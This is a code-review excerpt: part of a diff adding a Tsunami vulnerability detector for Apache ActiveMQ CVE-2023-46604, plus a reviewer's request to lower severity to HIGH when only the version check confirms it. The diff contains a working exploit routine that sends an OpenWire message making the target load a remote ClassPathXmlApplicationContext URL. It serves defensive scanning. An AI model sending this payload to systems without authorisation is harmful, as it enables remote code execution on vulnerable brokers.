community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604Detector.java

```diff
@@ -0,0 +1,266 @@
+        payloadString = "http://" + payloadString;
+      }
+      Socket socket = socketFactory.createSocket(host, port);
+      OutputStream os = socket.getOutputStream();
+      DataOutputStream dos = new DataOutputStream(os);
+      // Size
+      dos.writeInt(0);
+      // Type
+      dos.writeByte(31);
+      // CommandId
+      dos.writeInt(0);
+      // Command response required
+      dos.writeBoolean(false);
+      // CorrelationId
+      dos.writeInt(0);
+      // body
+      dos.writeBoolean(true);
+      // UTF
+      dos.writeBoolean(true);
+      dos.writeUTF("org.springframework.context.support.ClassPathXmlApplicationContext");
+      dos.writeBoolean(true);
+      dos.writeUTF(payloadString);
+
+      dos.close();
+      os.close();
+      socket.close();
+      return true;
+    } catch (IOException e) {
+      return false;
+    }
+  }
+
+  public static boolean checkVersionIsSecure(String currentVersion) {
+    String[] parts1 = currentVersion.split("\\.");
+    for (String secureVersion : SECURE_VERSIONS) {
+      String[] parts2 = secureVersion.split("\\.");
+      if (parts1[0].equals(parts2[0])) {
+        if (parts1[1].equals(parts2[1])) {
+          return Integer.parseInt(parts1[2]) >= Integer.parseInt(parts2[2]);
+        }
+      }
+    }
+    // If no secure minor version matches the current version, it's considered not secure by
+    // default.
+    return false;
+  }
+
+  private String getServerVersion(String serverAddress, int serverPort) {
+    try {
+      Socket socket = socketFactory.createSocket(serverAddress, serverPort);
+      DataInputStream dataInputStream = new DataInputStream(socket.getInputStream());
+      byte[] header = new byte[22];
+      dataInputStream.readFully(header);
+      Map<String, Object> maps = MarshallingSupport.unmarshalPrimitiveMap(dataInputStream, 4096);
+      return maps.get("ProviderVersion").toString();
+    } catch (Exception e) {
+      logger.atWarning().withCause(e).log("Get Target Version Failed");
+      return "";
+    }
+  }
+
+  private DetectionReport buildDetectionReport(
+      TargetInfo targetInfo, NetworkService vulnerableNetworkService) {
+    TextData details =
+        TextData.newBuilder().setText("current version is " + currentVersion).build();
+    return DetectionReport.newBuilder()
+        .setTargetInfo(targetInfo)
+        .setNetworkService(vulnerableNetworkService)
+        .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli()))
+        .setDetectionStatus(
+            useOobVerifyVulnerable
+                ? DetectionStatus.VULNERABILITY_VERIFIED
+                : DetectionStatus.VULNERABILITY_PRESENT)
+        .setVulnerability(
+            Vulnerability.newBuilder()
+                .setMainId(
+                    VulnerabilityId.newBuilder()
+                        .setPublisher("TSUNAMI_COMMUNITY")
+                        .setValue("CVE_2023_46604"))
+                .setSeverity(Severity.CRITICAL)
```

Comment:
I've been been recently advised by the Tsunami team that when vulnerabilities are not verified through the callback server, the severity should be reduced. So please change this so that if the detection was made only through the server version, the severity is `HIGH` instead of `CRITICAL`.